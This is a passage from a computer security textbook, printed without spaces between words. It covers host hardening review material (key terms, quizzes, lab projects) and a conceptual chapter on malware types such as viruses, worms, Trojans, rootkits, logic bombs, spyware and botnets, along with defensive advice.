Anti-malware/spyware/virusprotectionsareneededonhostmachinestopreventmaliciouscodeattacks.
Whitelistingcanprovidestrongprotectionsagainstmalwareonkeysystems.
Host-basedfirewallscanprovidespecificprotectionsfromsomeattacks.
Hardenapplications
Patchmanagementisadisciplinedapproachtotheacquisition,testing,andimplementationofOSandapplicationpatches.
Ahotfixisasinglepackagedesignedtoaddressaspecific,typicallysecurity-related,probleminanoperatingsystemorapplication.
Apatchisafixorcollectionoffixesthataddressesvulnerabilitiesorerrorsinoperatingsystemsorapplications.
Aservicepackisalargecollectionoffixes,corrections,andenhancementsforanoperatingsystem,application,orgroupofapplications.
Establishgrouppolicies
Grouppoliciesareamethodformanagingthesettingsand
configurationsofmanydifferentusersandsystemsinanActiveDirectoryenvironment.
Grouppoliciescanbeusedtorefine,set,ormodifyasystem’sRegistrysettings,auditingandsecuritypolicies,userenvironments,logon/logoffscripts,andsoon.
Securitytemplatesarecollectionsofsecuritysettingsthatcanbeappliedtoasystem.Securitytemplatescancontainhundredsofsettingsthatcontrolormodifysettingsonasystem,suchaspasswordlength,auditingofuseractions,orrestrictionsonnetworkaccess.
Securealternativeenvironments
Alternativeenvironmentsincludeprocesscontrol(SCADA)networks,embeddedsystems,mobiledevices,mainframes,gameconsoles,transportationsystems,andmore.
Alternativeenvironmentsrequiresecurity,butarenotuniversallyequivalenttoITsystems,sothespecificscanvarytremendouslyfromsystemtosystem.
KeyTermsantispam(430)antivirus(AV)(427)applicationhardening(444)applicationvulnerabilityscanner(449)baseline(409)baselining(409)blacklisting(434)firmwareupdate(442)globallyuniqueidentifier(GUID)(450)grouppolicy(450)
grouppolicyobject(GPO)(450)hardening(408)hardwaresecuritymodule(HSM)(438)heuristicscanning(427)hostvulnerabilityscanner(448)hotfix(423)networkoperatingsystem(NOS)(410)networksegmentation(457)networkvulnerabilityscanner(448)operatingsystem(OS)(409)patch(424)patchmanagement(445)PluggableAuthenticationModules(PAM)(419)pop-upblocker(433)processidentifier(PID)(418)referencemonitor(410)runlevels(418)securitykernel(410)securitytemplate(452)servicepack(424)shadowfile(418)TCPwrappers(419)TrustedOperatingSystem(434)TrustedPlatformModule(TPM)(438)whitelisting(434)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1._______________istheprocessofestablishingasystem’ssecuritystate.
2.Securingandpreparingasystemfortheproductionenvironmentiscalled_____________.
3.A(n)_______________isasmallsoftwareupdatedesignedtoaddressaspecific,oftenurgent,problem.
4.Thebasicsoftwareonacomputerthathandlesinputandoutputiscalledthe_______________.
5.____________istheuseofthenetworkarchitecturetolimitcommunicationbetweendevices.
6.A(n)_______________isabundledsetofsoftwareupdates,fixes,andadditionalfunctionscontainedinaself-installingpackage.
7.InmostUNIXoperatingsystems,eachrunningprogramisgivenauniquenumbercalleda(n)_______________.
8.Whenauserorprocesssuppliesmoredatathanwasexpected,a(n)_______________mayoccur.
9._______________areusedtodescribethestateofinitandwhatsystemservicesareoperatinginUNIXsystems.
10.A(n)_______________isacollectionofsecuritysettingsthatcanbeappliedtoasystem.
Multiple-ChoiceQuiz1.Asmallsoftwareupdatedesignedtoaddressanurgentorspecific
problemiscalleda:
A.Hotfix
B.Servicepack
C.Patch
D.Noneoftheabove
2.InaUNIXoperatingsystem,whichrunleveldescribessingle-usermode?
A.0
B.6
C.4
D.1
3.TCPwrappersdowhat?A.Helpsecurethesystembyrestrictingnetworkconnections
B.Helpprioritizenetworktrafficforoptimalthroughput
C.Encryptoutgoingnetworktraffic
D.Stripoutexcessinputtodefeatbufferoverflowattacks
4.FilepermissionsunderUNIXconsistofwhatthreetypes?A.Modify,read,andexecute
B.Read,write,andexecute
C.Fullcontrol,read-only,andrun
D.Write,read,andopen
5.ThemechanismthatallowsforcentralizedmanagementandconfigurationofcomputersandremoteusersinanActiveDirectoryenvironmentiscalled:
A.Baseline
B.Grouppolicies
C.SimpleNetworkManagementProtocol
D.Securitytemplates
6.WhatfeatureinWindowsServer2008controlsaccesstonetworkresourcesbasedonaclientcomputer’sidentityandcompliancewithcorporategovernancepolicy?
A.BitLocker
B.NetworkAccessProtection
C.inetd
D.Processidentifiers
7.TostopaparticularserviceorprogramrunningonaUNIXoperatingsystem,youmightusethe______command.
A.netstat
B.ps
C.kill
D.inetd
8.UpdatingthesoftwareloadedonnonvolatileRAMiscalled:A.Abufferoverflow
B.Afirmwareupdate
C.Ahotfix
D.Aservicepack
9.TheshadowfileonaUNIXsystemcontains:A.Thepasswordassociatedwithauseraccount
B.Grouppolicyinformation
C.Filepermissionsforsystemfiles
D.Networkservicesstartedwhenthesystemisbooted
10.OnaUNIXsystem,ifafilehasthepermissionsrwxr-xrw-,whatpermissionsdoestheownerofthefilehave?
A.Readonly
B.Readandwrite
C.Read,write,andexecute
D.None
EssayQuiz1.Explainthedifferencebetweena“hotfix”anda“servicepack”and
describewhybotharesoimportant.
2.Anewadministratorneedssomehelpcreatingasecuritybaseline.Createachecklist/templatethatcoversthebasicstepsincreatingasecuritybaselinetoassistthem,andexplainwhyeachstepisimportant.
LabProjects
•LabProject14.1UsealabsystemrunningLinuxwithatleastoneopenservicesuchasFTP,Telnet,orSMTP.Fromanotherlabsystem,connecttotheLinuxsystemandobserveyourresults.ConfigureTCPwrappersontheLinuxsystemtorejectallconnectionattemptsfromtheotherlabsystem.Nowtrytoreconnect,andobserveyourresults.DocumentyourstepsandexplainhowTCPwrapperswork.
•LabProject14.2UsingasystemrunningWindows,experimentwiththePasswordPolicysettingsundertheLocalSecurityPolicy(Settings|ControlPanel|AdministrativeTools|LocalSecurityPolicy).FindthesettingforPasswordsMustMeetComplexityRequirementsandmakesureitis
disabled.Setthepasswordontheaccountyouareusingtobob.NowenablethePasswordsMustMeetComplexityRequirementssettingsandattempttochangeyourpasswordtojane.Wereyouabletochangeitto“jane”?Explainwhyorwhynot.Setyourpasswordtosomethingthesystemwillallowandexplainhowyouselectedthatpasswordandhowitmeetsthecomplexityrequirements.
chapter15 TypesofAttacksandMaliciousSoftware
Ifyouknowtheenemyandknowyourselfyouneednotfeartheresultsofahundredbattles.
—SUNTZU
A
Inthischapter,youwilllearnhowto
Describethevarioustypesofcomputerandnetworkattacks,includingdenial-of-service,spoofing,hijacking,andpasswordguessing
Identifythedifferenttypesofmalicioussoftwarethatexist,includingviruses,worms,Trojanhorses,logicbombs,timebombs,androotkits
Explainhowsocialengineeringcanbeusedasameanstogainaccesstocomputersandnetworks
Describetheimportanceofauditingandwhatshouldbeaudited
ttackscanbemadeagainstvirtuallyanylayerorlevelofsoftware,fromnetworkprotocolstoapplications.Whenanattackerfindsavulnerabilityinasystem,heexploitstheweaknesstoattackthe
system.Theeffectofanattackdependsontheattacker’sintentandcanresultinawiderangeofeffects,fromminortosevere.Anattackononesystemmightnotbevisibleontheuser’ssystembecausetheattackisactuallyoccurringonadifferentsystem,andthedatatheattackerwillmanipulateonthesecondsystemisobtainedbyattackingthefirstsystem.
AvenuesofAttackAcomputersystemisattackedforoneoftwogeneralreasons:itisspecificallytargetedbyanattacker,oritisatargetofopportunity.Inthefirstcase,theattackerhaschosenthetargetnotbecauseofthehardwareorsoftwaretheorganizationisrunningbutforanotherreason,suchasapoliticalreason.Forexample,anindividualinonecountrymightattackagovernmentsysteminanothercountrytogathersecretinformation.Ortheattackermighttargetanorganizationaspartofa“hacktivist”attack—theattackercoulddefacethewebsiteofacompanythatsellsfurcoatsbecausetheattackerbelievesusinganimalsinthiswayisunethical,forexample.Perpetratingsomesortofelectronicfraudisanotherreasonaspecificsystemmightbetargetedforattack.Whateverthereason,the
attackerusuallybeginsanattackofthisnaturebeforeheknowswhichhardwareandsoftwaretheorganizationuses.Thesecondtypeofattack,anattackagainstatargetofopportunity,is
launchedagainstasitethathashardwareorsoftwarethatisvulnerabletoaspecificexploit.Theattacker,inthiscase,isnottargetingtheorganization;hehasinsteadlearnedofaspecificvulnerabilityandissimplylookingforanorganizationwiththisvulnerabilitythathecanexploit.Thisisnottosaythatanattackermightnotbetargetingagivensectorandlookingforatargetofopportunityinthatsector.Forexample,anattackerwhowantstoobtaincreditcardorotherpersonalinformationmaysearchforanyexploitablecompanythatstorescreditcardinformationonitssystemtoaccomplishtheattack.Targetedattacksaremoredifficultandtakemoretimeandeffortthan
attacksonatargetofopportunity.Thelattertypeofattacksimplyreliesonthefactthat,withanypieceofwidelydistributedsoftware,somebodyintheorganizationwillnothavepatchedthesystemastheyshouldhave.
TechTip
DefenseBeginswithEliminatingVulnerabilitiesDefenseagainstattacksbeginswitheliminationofvulnerabilities.Vulnerabilitiesareexploitedbyattackerstogainaccesstoasystem.Minimizationofvulnerabilitiesisoneofthefoundationalelementsofdefense.
CrossCheckAnatomyofanAttackHackersuseaprocesswhenattacking,andthisiscoveredindetailinChapter22.
MinimizingPossibleAvenuesofAttack
Byunderstandingthestepsanattackercantake,youcanlimittheexposureofyoursystemandminimizethepossibleavenuesanattackercanexploit.Yourfirststeptominimizepossibleattacksistoensurethatallpatchesfortheoperatingsystemandapplicationsareinstalled.Manysecurityproblems,suchasvirusesandworms,exploitknownvulnerabilitiesforwhichpatchesactuallyexist.Theseattacksaresuccessfulonlybecauseadministratorshavenottakentheappropriateactionstoprotecttheirsystems.Thenextstepistolimittheservicesthatarerunningonthesystem.As
mentionedinearlierchapters,limitingthenumberofservicestothosethatareabsolutelynecessaryprovidestwosafeguards:itlimitsthepossibleavenuesofattack(thepossibleservicesforwhichavulnerabilitymayexistandbeexploited),anditreducesthenumberofservicestheadministratorhastoworryaboutpatchinginthefirstplace.
CrossCheckBaselineAnalysisandPatchingofSystemsKeepingasystempatchedanduptodatefortheoperatingsystemandapplicationsisthebestdefenseagainstexposedvulnerabilities.Howuptodateisthesystemyouarecurrentlyusing?Howdoyouknow?Chapter14coversthebaseliningandpatchingofsystemstounderstandandremovevulnerabilities.Refertothatchapterformorein-depthinformationonhowtoperformtheseactivities.
Anotherstepistolimitpublicdisclosureofprivateinformationaboutyourorganizationanditscomputingresources.Sincetheattackerisafterthisinformation,don’tmakeiteasytoobtain.
MaliciousCodeMaliciouscode,ormalware,referstosoftwarethathasbeendesignedforsomenefariouspurpose.Suchsoftwarecanbedesignedtocausedamagetoasystem,suchasbydeletingallfiles,oritcanbedesignedtocreatea
backdoorinthesystemtograntaccesstounauthorizedindividuals.Mostmalwareinstancesattackvulnerabilitiesinprogramsoroperatingsystems.Thisiswhypatchingofvulnerabilitiesissoimportant,foritclosesthepointofentryformostmalware.Generallytheinstallationofmaliciouscodeisdoneinsuchawaythatitisnotobvioustotheauthorizedusers.Severaldifferenttypesofmalicioussoftwarecanbeused,suchasviruses,Trojanhorses,logicbombs,spyware,andworms,andtheydifferinthewaystheyareinstalledandtheirpurposes.Malwarecanbefairlycomplexinitsconstruction,withspecificfeatures
designedtoassistmalwareinavoidingdetection.Modernmalwarecanbemultipartinconstruction,whereseveralpiecesworktogethertoachieveadesiredeffect.Whenmalwarehasmultipledifferentobjectsthatitspecificallyattacks,itiscalledmultipartite.Manytypesofmalwarecanincludeachangingencryptionlayertoresistpattern-matchingdetection.Thesearecalledpolymorphic.Ifthemalwareactuallychangesthecodeattimeofinfection,thispropertyiscalledmetamorphic.
VirusesThebest-knowntypeofmaliciouscodeisthevirus.Muchhasbeenwrittenaboutvirusesasaresultofseveralhigh-profilesecurityeventsthatinvolvedthem.Avirusisapieceofmaliciouscodethatreplicatesbyattachingitselftoanotherpieceofexecutablecode.Whentheotherexecutablecodeisrun,thevirusalsoexecutesandhastheopportunitytoinfectotherfilesandperformanyothernefariousactionsitwasdesignedtodo.Thespecificwaythatavirusinfectsotherfiles,andthetypeoffilesitinfects,dependsonthetypeofvirus.Thefirstvirusescreatedwereoftwotypes—bootsectorvirusesandprogramviruses.
BootSectorVirusAbootsectorvirusinfectsthebootsectorportionofeitherafloppydiskoraharddrive(yearsago,notallcomputershadharddrives,andmanybootedfromafloppy).Whenacomputerisfirstturnedon,asmallportion
oftheoperatingsystemisinitiallyloadedfromhardware.Thissmalloperatingsystemthenattemptstoloadtherestoftheoperatingsystemfromaspecificlocation(sector)oneitherthefloppyortheharddrive.Abootsectorvirusinfectsthisportionofthedrive.AnexampleofthistypeofviruswastheStonedvirus,whichmovedthe
trueMasterBootRecord(MBR)fromthefirsttotheseventhsectorofthefirstcylinderandreplacedtheoriginalMBRwiththeviruscode.Whenthesystemwasturnedon,theviruswasfirstexecuted,whichhadaone-in-sevenchanceofdisplayingamessagestatingthecomputerwas“stoned”;otherwise,itwouldnotannounceitselfandwouldinsteadattempttoinfectotherbootsectors.Thisviruswasrathertameincomparisontoothervirusesofitstime,whichwereoftendesignedtodeletetheentireharddriveafteraperiodoftimeinwhichtheywouldattempttospread.
ProgramVirusAsecondtypeofvirusistheprogramvirus,whichattachesitselftoexecutablefiles—typicallyfilesendingin.exeor.comonWindows-basedsystems.Thevirusisattachedinsuchawaythatitisexecutedbeforetheprogramexecutes.Mostprogramvirusesalsohideanefariouspurpose,suchasdeletingtheharddrivedata,whichistriggeredbyaspecificevent,suchasadateorafteracertainnumberofotherfilesareinfected.Likeothertypesofviruses,programvirusesareoftennotdetecteduntilaftertheyexecutetheirmaliciouspayload.Onemethodthathasbeenusedtodetectthissortofvirusbeforeithasanopportunitytodamageasystemistocalculatechecksumsforcommonlyusedprogramsorutilities.Shouldthechecksumforanexecutableeverchange,itisquitelikelythatitisduetoavirusinfection.
TechTip
ModernVirusandWormThreatsEarlyvirusandwormattackswouldcausedamagetoPCs,buttheyweregenerallyvisibleto
users.Manymodernvirusesandwormsareusedtodeliverpayloadsthatleadtomachinesbecomingzombiesinabotnet,controlledbyanattacker.Thistypeofattackistypicallyinvisibletotheenduser,soasnottoalertthemtothemalware.
MacroVirusInthelate1990s,anothertypeofvirusappearedthatnowaccountsforthemajorityofviruses.Assystemsandoperatingsystemsbecamemorepowerful,thebootsectorvirus,whichonceaccountedformostreportedinfections,becamelesscommon.Systemsnolongercommonlybootedfromfloppies,whichwerethemainmethodforbootsectorvirusestospread.Instead,theproliferationofsoftwarethatincludedmacro-programminglanguagesresultedinanewbreedofvirus—themacrovirus.TheConceptviruswasthefirstknownexampleofthisnewbreed.It
appearedtobecreatedtodemonstratethepossibilityofattachingavirustoadocumentfile,somethingthathadbeenthoughttobeimpossiblebeforetheintroductionofsoftwarethatincludedpowerfulmacrolanguagecapabilities.Bythistime,however,MicrosoftWorddocumentscouldincludesegmentsofcodewritteninaderivativeofVisualBasic.Furtherdevelopmentofotherapplicationsthatallowedmacrocapability,andenhancedversionsoftheoriginalmacrolanguage,hadthesideeffectofallowingtheproliferationofvirusesthattookadvantageofthiscapability.Thistypeofvirusissocommontodaythatitisconsideredasecurity
bestpracticetoadviseusersnevertoopenadocumentattachedtoane-mailifitseemsatallsuspicious.ManyorganizationsnowroutinelyhavetheirmailserverseliminateanyattachmentscontainingVisualBasicmacros.
AvoidingVirusInfectionAlwaysbeingcautiousaboutexecutingprogramsoropeningdocumentssenttoyouisagoodsecuritypractice.“Ifyoudon’tknowwhereitcamefromorwhereithasbeen,don’topenorrunit”shouldbethebasicmantraforallcomputerusers.Anothersecuritybestpracticeforprotectingagainstvirusinfectionistoinstallandrunanantivirusprogram.Sincethese
programsaredesignedtoprotectagainstknownviruses,itisalsoimportanttomaintainanup-to-datelistingofvirussignaturesforyourantivirussoftware.Antivirussoftwarevendorsprovidethisinformation,andadministratorsshouldstayontopofthelatestupdatestothelistofknownviruses.Twoadvancesinviruswritinghavemadeitmoredifficultforantivirus
softwaretodetectviruses.Theseadvancesaretheintroductionofstealthvirustechniquesandpolymorphicviruses.Astealthyvirusemploystechniquestohelpevadebeingdetectedbyantivirussoftwarethatuseschecksumsorothertechniques.Polymorphicvirusesalsoattempttoevadedetection,buttheydosobychangingthevirusitself(thevirus“evolves”).Becausetheviruschanges,signaturesforthatvirusmaynolongerbevalid,andthevirusmayescapedetectionbyantivirussoftware.
ArmoredVirusWhenanewformofmalware/virusisdiscovered,antiviruscompaniesandsecurityresearcherswilldecompiletheprograminanattempttoreverse-engineeritsfunctionality.Muchcanbedeterminedfromreverseengineering,suchaswherethemalwarecamefrom,howitworks,howitcommunicates,howitspreads,andsoforth.Armoringmalwarecanmaketheprocessofdeterminingthisinformationmuchmoredifficult,ifnotimpossible.Somemalware,suchasZeus,comesencryptedinwaystopreventcriminalsfromstealingtheintellectualpropertyoftheverymalwarethattheyuse.
Modernviruseshaveawholehostofdefensesfromdetectionandanalysis.Polymorphicviruseschangetheirappearance,makingsignaturematchesdifficult.Armoredvirusesresistbeingreverse-engineeredtodeterminehowtheyoperate.Virusesaredesignedtobequiet,avoiddetection,avoidanalysis,andstillwork—theyaresignificantthreats.
VirusHoaxes
ViruseshavecausedsomuchdamagetosystemsthatmanyInternetusersbecomeextremelycautiousanytimetheyheararumorofanewvirus.ManyuserswillnotconnecttotheInternetwhentheyhearaboutavirusoutbreak,justtobesuretheirmachinesdon’tgetinfected.Thishasgivenrisetovirushoaxes,inwhichwordisspreadaboutanewvirusandtheextremedangeritposes.ItmaywarnuserstonotreadcertainfilesorconnecttotheInternet.Hoaxescanactuallybeevenmoredestructivethanjustwastingtimeand
bandwidth.Somehoaxeswarningofadangerousvirushaveincludedinstructionstodeletecertainfilesifthey’refoundontheuser’ssystem.Unfortunatelyforthosewhofollowtheadvice,thefilesmayactuallybepartoftheoperatingsystem,anddeletingthemcouldkeepthesystemfrombootingproperly.Thissuggestsanothergoodpieceofsecurityadvice:makesureoftheauthenticityandaccuracyofanyvirusreportbeforefollowingsomebody’sadvice.Antivirussoftwarevendorsareagoodsourceoffactualdataforthissortofthreataswell.
WormsItwasonceeasytodistinguishbetweenawormandavirus.Recently,withtheintroductionofnewbreedsofsophisticatedmaliciouscode,thedistinctionhasblurred.Wormsarepiecesofcodethatattempttopenetratenetworksandcomputersystems.Onceapenetrationoccurs,thewormwillcreateanewcopyofitselfonthepenetratedsystem.Reproductionofawormthusdoesnotrelyontheattachmentofthevirustoanotherpieceofcodeortoafile,whichisthedefinitionofavirus.Virusesweregenerallythoughtofasasystem-basedproblem,and
wormswerenetwork-based.Ifthemaliciouscodeissentthroughoutanetwork,itmaysubsequentlybecalledaworm.Theimportantdistinction,however,iswhetherthecodehastoattachitselftosomethingelse(avirus)orifitcan“survive”onitsown(aworm).SomeexamplesofwormsthathavehadhighprofilesincludetheSobig
wormof2003,theSQLSlammerwormof2003,the2001attacksofCode
RedandNimba,andthe2005Zotobworm,whichtookdownCNNLive.Nimbawasparticularlyimpressiveinthatitusedfivedifferentmethodstospread:viae-mail,viaopennetworkshares,frombrowsinginfectedwebsites,usingthedirectory-traversalvulnerabilityofMicrosoftIIS4.0/5.0,and,mostimpressively,throughtheuseofbackdoorsleftbyCodeRedIIandsadmindworms.TheConfickerworm,discoveredin2008,spawnedsucharesponsethatitearneditsownworkinggroup.Manymodernmalwareitems,suchasGameoverZeus,werespreadasviruses.
TechTip
SocialMediaWormsIn2005,acleverMySpaceuserlookingtoexpandhisfriendslistcreatedthefirstself-propagatingcross-sitescripting(XSS)worm.Inlessthanaday,theworm,nowknownastheSamyworm(orMySpaceworm),hadgoneviralanduserSamyhadamassedmorethan1millionfriendsonthepopularonlinecommunity.MySpacewastakendownbecausethewormreplicatedtooefficiently,eventuallysurpassingseveralthousandreplicationspersecond.In2008,Koobfaceappeared,anditspreadviaFacebook,Skype,andothersocialmedia
platforms.Koobfacegivesanattackeraccesstoyourpersonalinformation,suchasyourbankinginformation,passwords,orotherpersonaldetails.Itthenmakesthecomputerpartofabotnet.
ProtectionAgainstWormsHowyouprotectyoursystemagainstwormsdependsonthetypeofworm.Thoseattachedandpropagatedthroughe-mailcanbeavoidedbyfollowingthesameguidelinesaboutnotopeningfilesandnotrunningattachmentsunlessyouareabsolutelysureoftheiroriginandintegrity.Protectingagainstwormsinvolvessecuringsystemsandnetworksagainstpenetrationinthesamewayyouwouldprotectyoursystemsagainsthumanattackers:installpatches,eliminateunusedandunnecessaryservices,enforcegoodpasswordsecurity,andusefirewallsandintrusiondetectionsystems.Moresophisticatedattacks,suchastheSamyworm,arealmostimpossibletoavoid.
PolymorphicMalwareThedetectionofmalwarebyantimalwareprogramsisprimarilydonethroughtheuseofasignature.Filesarescannedforsectionsofcodeintheexecutablethatactasmarkers,uniquepatternsofcodethatenabledetection.Justasthehumanbodycreatesantigensthatmatchmarkerproteins,antimalwareprogramsdetectmalwarethroughuniquemarkerspresentinthecodeofthemalware.Malwarewritersareawareofthisfunctionalityandhaveadapted
methodstodefeatit.Oneoftheprimarymeansofavoidingdetectionbysensorsistheuseofpolymorphiccode,whichiscodethatchangesonaregularbasis.Thesechangesormutationsaredesignednottoaffectthefunctionalityofthecode,butrathertomaskanysignaturefromdetection.Polymorphicprogramscanchangetheircodingaftereachuse,makingeachreplicantdifferentfromadetectionpointofview.
TrojanHorsesATrojanhorse,orsimplyTrojan,isapieceofsoftwarethatappearstodoonething(andmay,infact,actuallydothatthing)buthidessomeotherfunctionality.Theanalogytothefamousstoryofantiquityisveryaccurate.Intheoriginalcase,theobjectappearedtobealargewoodenhorse,andinfactitwas.Atthesametime,ithidsomethingmuchmoresinisteranddangeroustotheoccupantsofthecityofTroy.Aslongasthehorsewasleftoutsidethecitywalls,itcouldcausenodamagetotheinhabitants.Ithadtobetakeninbytheinhabitants,anditwasinsidethatthehiddenpurposewasactivated.AcomputerTrojanworksinmuchthesameway.Unlikeavirus,whichreproducesbyattachingitselftootherfilesorprograms,aTrojanisastandaloneprogramthatmustbecopiedandinstalledbytheuser—itmustbe“broughtinside”thesystembyanauthorizeduser.Thechallengefortheattackerisenticingtheusertocopyandruntheprogram.Thisgenerallymeansthattheprogrammustbedisguisedassomethingthattheuserwouldwanttorun—aspecialutility
orgame,forexample.Onceithasbeencopiedandisinsidethesystem,theTrojanwillperformitshiddenpurpose,withtheuseroftenstillunawareofitstruenature.ThesinglebestmethodtopreventtheintroductionofaTrojantoyour
systemisnevertorunsoftwareifyouareunsureofitsorigin,security,andintegrity.Avirus-checkingprogrammayalsobeusefulindetectingandpreventingtheinstallationofknownTrojans.
TechTip
FamousTrojansTherehavebeenmany“famous”Trojansthathavecausedsignificanthavocinsystems.BackOrifice(BO),createdin1999,wasofferedinseveralversions.BOcanbeattachedtoanumberoftypesofprograms.KoobfaceisaTrojanthataffectsFacebookusers.ZeusisafinancialTrojan/malwarethathasawiderangeoffunctionality.
RootkitsArootkitisaformofmalwarethatisspecificallydesignedtomodifytheoperationoftheoperatingsysteminsomefashiontofacilitatenonstandardfunctionality.ThehistoryofrootkitsgoesbacktothebeginningoftheUNIXoperatingsystem,wheretheyweresetsofmodifiedadministrativetools.Originallydesignedtoallowaprogramtotakegreatercontroloveroperatingsystemfunctionwhenitfailsorbecomesunresponsive,thetechniquehasevolvedandisusedinavarietyofways.
Inonehigh-profilecase,SonyBMGCorporationusedrootkittechnologytoprovidecopyprotectiontechnologyonsomeofthecompany’sCDs.TwomajorissuesledtothisbeingacompletedebacleforSony:first,thesoftwaremodifiedsystemswithouttheuser’sapproval;andsecond,thesoftwareopenedasecurityholeonWindows-basedsystems,creatinganexploitablevulnerabilityattherootkitlevel.ThisledtheSonycasetobelabeledasmalware,whichisthemostcommonuseofrootkits.
Arootkitcandomanythings—infact,itcandovirtuallyanythingthattheoperatingsystemdoes.Rootkitsmodifytheoperatingsystemkernelandsupportingfunctions,changingthenatureofthesystem’soperation.Rootkitsaredesignedtoavoid,eitherbysubversionorevasion,thesecurityfunctionsoftheoperatingsystemtoavoiddetection.Rootkitsactasaformofmalwarethatcanchangethreadprioritiestoboostanapplication’sperformance,performkeylogging,actasasniffer,hideotherfilesfromotherapplications,orcreatebackdoorsintheauthenticationsystem.Theuseofrootkitfunctionalitytohideotherprocessesandfilesenablesanattackertouseaportionofacomputerwithouttheuserorotherapplicationsknowingwhatishappening.Thishidesexploitcodefromantivirusandantispywareprograms,actingasacloakofinvisibility.
ExamTip:Fivetypesofrootkitsexist:
FirmwareAttacksfirmwareonasystemVirtualAttacksatthevirtualmachinelevel
KernelAttacksthekerneloftheOSLibraryAttackslibrariesusedonasystem
ApplicationlevelAttacksspecificapplications
Rootkitscanloadbeforetheoperatingsystemloads,actingasavirtualizationlayer,asinSubVirtandBluePill.Rootkitscanexistinfirmware,andthesehavebeendemonstratedinbothvideocardsandPCIexpansioncards.Rootkitscanexistasloadablelibrarymodules,effectivelychangingportionsoftheoperatingsystemoutsidethekernel.Furtherinformationonspecificrootkitsinthewildcanbefoundatwww.antirootkit.com.Oncearootkitisdetected,itneedstoberemovedandcleanedup.
Becauseofrootkits’invasivenature,andthefactthatmanyaspectsof
rootkitsarenoteasilydetectable,mostsystemadministratorsdon’tevenattempttocleanuporremovearootkit.Itisfareasiertouseapreviouslycapturedcleansystemimageandreimagethemachinethantoattempttodeterminethedepthandbreadthofthedamageandfixindividualfiles.
LogicBombsLogicbombs,unlikevirusesandTrojans,areatypeofmalicioussoftwarethatisdeliberatelyinstalled,generallybyanauthorizeduser.Alogicbombisapieceofcodethatsitsdormantforaperiodoftimeuntilsomeeventinvokesitsmaliciouspayload.Anexampleofalogicbombmightbeaprogramthatissettoloadandrunautomatically,andthatperiodicallychecksanorganization’spayrollorpersonneldatabaseforaspecificemployee.Iftheemployeeisnotfound,themaliciouspayloadexecutes,deletingvitalcorporatefiles.
Iftheeventinvokingthelogicbombisaspecificdateortime,theprogramwilloftenbereferredtoasatimebomb.Inonefamousexampleofatimebomb,adisgruntledemployeeleftatimebombinplacejustpriortobeingfiredfromhisjob.Twoweekslater,thousandsofclientrecordsweredeleted.Policewereeventuallyabletotrackthemaliciouscodetothedisgruntledex-employee,whowasprosecutedforhisactions.Hehadhopedthatthetwoweeksthathadpassedsincehisdismissalwouldhavecausedinvestigatorstoassumehecouldnothavebeentheindividualwhohadcausedthedeletionoftherecords.
Logicbombsaredifficulttodetectbecausetheyareofteninstalledbyauthorizedusersand,inparticular,byadministratorswhoarealsooftenresponsibleforsecurity.Thisdemonstratestheneedforaseparationofdutiesandaperiodicreviewofallprogramsandservicesthatarerunningonasystem.Italsoillustratestheneedtomaintainanactivebackupprogramsothatifyourorganizationlosescriticalfilestothissortofmaliciouscode,itlosesonlytransactionsthatoccurredsincethemostrecentbackupandnopermanentlossofdataresults.
SpywareSpywareissoftwarethat“spies”onusers,recordingandreportingontheiractivities.Typicallyinstalledwithoutuserknowledge,spywarecandoawiderangeofactivities.Itcanrecordkeystrokes(commonlycalledkeylogging)whentheuserlogsintospecificwebsites.Itcanmonitorhowauserusesaspecificpieceofsoftware(forexample,monitorattemptstocheatatgames).
Keyloggingisoneoftheholygrailsforattackers,foriftheycangetakeyloggeronamachine,thecapturingofuser-typedcredentialsisaquickwinfortheattacker.
Manyusesofspywareseeminnocuousatfirst,buttheunauthorizedmonitoringofasystemcanbeabusedveryeasily.Inothercases,thespywareisspecificallydesignedtostealinformation.Manystateshavepassedlegislationbanningtheunapprovedinstallationofsoftware,butmanycasesofspywarecircumventthisissuethroughcomplexandconfusingend-userlicenseagreements.
AdwareThebusinessofsoftwaredistributionrequiresaformofrevenuestreamtosupportthecostofdevelopmentanddistribution.Oneformofrevenuestreamisadvertising.Softwarethatissupportedbyadvertisingiscalledadware.Adwarecomesinmanydifferentforms.Withlegitimateadware,theuserisawareoftheadvertisingandagreestothearrangementinreturnforfreeuseofthesoftware.Thistypeofadwareoftenoffersanalternative,ad-freeversionforafee.Adwarecanalsorefertoaformofmalware,whichischaracterizedbysoftwarethatpresentsunwantedads.Theseadsaresometimesanirritant,andatothertimesrepresentanactualsecuritythreat.Frequentlytheseadsareintheformofpop-upbrowserwindows,
andinsomecasestheycascadeuponanyuseraction.
BotnetsMalwarecanhaveawiderangeofconsequencesonamachine,fromrelativelybenigntoextremelyserious.Oneformofmalwarethatisseeminglybenigntoauserisabotnetzombie.Hackerscreatearmiesofmachinesbyinstallingmalwareagentsonthemachines,whichthenarecalledzombies.Thesecollectionsofmachinesarecalledbotnets.Thesezombiesmachinesareusedtoconductotherattacksandtospreadspamandothermalware.Botnetshavegrownintonetworksofoveramillionnodesandareresponsiblefortensofmillionsofspammessagesdaily.
TechTip
FamousBotnetsThefollowingaresomefamousbotnetsandtheircurrentstatus:
Sometimebefore2007,theFBIbeganananti-botnetoperationdubbedBotRoast.Theoperationdismantledseveralbotnetsandledtoseveralconvictionsofbotnetoperators.Othersuccessfulanti-botnetoperationsincludetheMcColotakedown,whichdecimatedRustock,andcoordinatedeffortsbyindustry,academia,andlawenforcementthathaveledtothedismantlingofBredoLabs,Mariposa,andsignificantinroadsagainstConfickerandZeus.
BackdoorsandTrapdoorsBackdoorswereoriginally(andsometimesstillare)nothingmorethanmethodsusedbysoftwaredeveloperstoensurethattheycouldgainaccesstoanapplicationevenifsomethingweretohappeninthefuturetopreventnormalaccessmethods.Anexamplewouldbeahard-codedpasswordthatcouldbeusedtogainaccesstotheprogramintheeventthatadministratorsforgottheirownsystempassword.Theobviousproblemwiththissortofbackdoor(alsosometimesreferredtoasatrapdoor)isthat,sinceitishard-coded,itcannotberemoved.Shouldanattackerlearnofthebackdoor,allsystemsrunningthatsoftwarewouldbevulnerabletoattack.Thetermbackdoorisalso,andmorecommonly,usedtoreferto
programsthatattackersinstallaftergainingunauthorizedaccesstoasystemtoensurethattheycancontinuetohaveunrestrictedaccesstothesystem,eveniftheirinitialaccessmethodisdiscoveredandblocked.Backdoorscanalsobeinstalledbyauthorizedindividualsinadvertently,shouldtheyrunsoftwarethatcontainsaTrojanhorse(introducedearlier).Avariationonthebackdooristherootkit,discussedintheprevioussection,whichisestablishednottogainrootaccessbutrathertoensurecontinuedrootaccess.
